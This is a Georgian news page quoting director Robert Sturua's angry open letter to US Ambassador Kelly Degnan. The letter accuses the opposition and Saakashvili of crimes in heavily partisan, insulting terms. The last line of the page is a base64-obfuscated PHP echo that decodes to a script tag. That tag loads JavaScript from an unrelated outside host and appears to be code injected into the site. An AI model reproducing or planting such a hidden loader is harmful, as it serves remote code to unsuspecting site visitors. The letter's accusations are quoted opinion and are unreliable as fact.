celsiusi
ავერსი საქკაბელი
რუსთაველის თეატრის სამხატვრო ხელმძღვანელი რობერტ სტურუა აშშ-ის ელჩს, კელი დეგნანს მიმართავს. რეჟისრომა წერილი სოციალურ ქსელში გამოაქვეყნა. 
 
"ოღონდ ერთი მთავარი და აუცილებელი თხოვნა უნდა შემისრულოთ: არ მისცეთ სათარგმნელად ეს ჩემი თითქოს ვულკანიდან ამოხეთქილი "ემოციის ლავა" თქვენს მომხიბლავ ნაცისტ გოგონებს - ისინი არ გითარგმიან ზუსტად ჩემს გულის ნადებს, ისევე, როგორც ოსტატურად გიმალავენ სიმართლეს და არაფერს გიყვებიან საქართველოს დაუძინებელ მტრებ-ნაცისტების ინტრიგებზე! მაშ ასე, ვიწყებ! რატომ ჩაგვაცივდით ქართველებს, თითქოს "ბანანის რესპუბლიკის” მკვიდრნი ვიყოთ - და რომ ჩვენ სასწრაფოდ უნდა შევურიგდეთ ოპოზიციას, სრულიად ზნედაცემულ ადამიანებს, ვისთვისაც ფულის, მთავრობის სავარძლების "პედოფილური" სიყვარულის გარდა არაფერი გააჩნიათ?! პირველად კაცობრიობის ისტორიაში დიდი ქვეყნის პრეზიდენტმა ბაიდენმა მეორე დიდი ქვეყნის პრეზიდენტს, პუტინს მკვლელი უწოდა! გადაამოწმეთ CIA-ს მონაცემები და დარწმუნდებით რომ საქართველოს ყოფილ პრეზიდენტ სააკაშვილს და მის მაფიას ზუსტად იგივე დანაშაული მიუძღვის! მე ვფიქრობ, რომ თქვენნაირმა პროფესიონალმა ეს ძალიან კარგად იცის! მაშ რას ერჩით საქართველოს? რას გვერჩით უბედურ და ჯერ კიდევ პატიოსან მოქალაქეებს? რა გსურთ? 1. საბოლოოდ რომ გვეტიროს ყოფა? 2. ერთმანეთი დავკლათ და აქ 3. "აკაპულკო-კურორტი" გაგაშენებინოთ ვიღაც უსაქმურ ტურისტებისთვის. 4. თუ მეორე ფრონტი გავხსნათ ოკუპირებულმა ქვეყანამ, (ყოფილმა პრეზიდენტმა და მისმა აქმრებმა ერთი მესამედი საქართველოსი რუსებს რომ ჩააბარეს) გავხსნათ მეორე ფრონტი და გ უ დ ბ ა ი! (ამასაც ქართულად ვწერ და ძალიან გთხოვთ, ზუსტად გითარგმნონ თქვენმა გაპრანჭულმა, ვითომ პატრიოტ გიორლსებმა?) 5. ან იქნებ გსურთ სასწრაფოდ სანქციები დავაკისროთ რუსეთს:
 
აღარ მივყიდოთ მჟავე მანდარინები და რამდენიმე ბოთლი ტკბილი "ხვანჩკარა" (იცით ალბათ, რომ ბევრი არ მოდის)? გამოგიტყდებით, ზოგჯერ მეჩვენება, რომ თქვენთვის ო’ჰენრის “მეფეები და კომბოსტო” არის ჩვენს მიმართ დამოკიდებულების მოდელი? ბოდიშს გიხდით ასეთ ემოციური წერილის გამო, მაგრამ მას შემდეგ, რაც საბჭოთა იმპერია დაინგრა და საქართველომ დაიბრუნა დამოუკიდებლობა და თავისუფლება, იქნებ მეტი თავისუფლების უფლება მოგვცეს ამერიკის შეერთებული შტატების ელჩმა, მისს კელი დაგნანმა?!.. ზოგჯერ მაინც!.. რა, არ გვაქვს უფლება? ვერ აგვიხსნია, რატომ გსურთ, თანაც ასე დაჟინებით, რომ ქედმაღალი და ამპარტავანი დიდი ქვეყნების მითითებით პატარა უძველესი ისტორიის და კულტურის ქვეყანამ, ერთი ციცქნა საქართველომ ჩავიდინოთ საბედისწერო შეცდომები, მხოლოდ იმიტომ, რომ თქვენ ასე გსურთ! გიკვირთ არა, რომ ომი არ გვინდა?! არ გახსოვთ, ჩვენ საკმარისად რომ ვიომეთ! დაგავიწყდათ? ის თუ გახსოვთ - დახმარების ნაცვლად თქვენმა ქვეყანამ დასალევი წყალი რომ გამოგვიგზავნა! ამავე დროს კი გულთბილი სერიოზულობით ქართველების მტრებს, ქურდბაცაცებს, ძალაუფლებით დაკაეფებულ მკვლელებთან სემინარებს აწყობთ ბაკურიანში! რატომ???ეს იგივეა, ამერიკელებს რომ შევძახოთ: ახლავე შეურიგდით ჯ ე ფ რ ი ე პ შ ტ ე ი ნ ს და ერთად გაუძეხით ბრწყინვალე ქვეყანასო?! ვერ მოასწარით: ეპშტეინმა საეჭვოთ მოიკლა თავი ნიუ იორკის ციხეში. ჩვენ კი მრისხანედ მიგვითითებთ: “ა ხ ლ ა ვ ე შ ე უ რ ი გ დ ი თ ქ ა რ თ ვ ე ლ ე პ შ ტ ე ი ნ ე ბ ს!_რ ა ტ ო მ?“, - წერს სტურუა სოციალურ ქსელში.
697
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");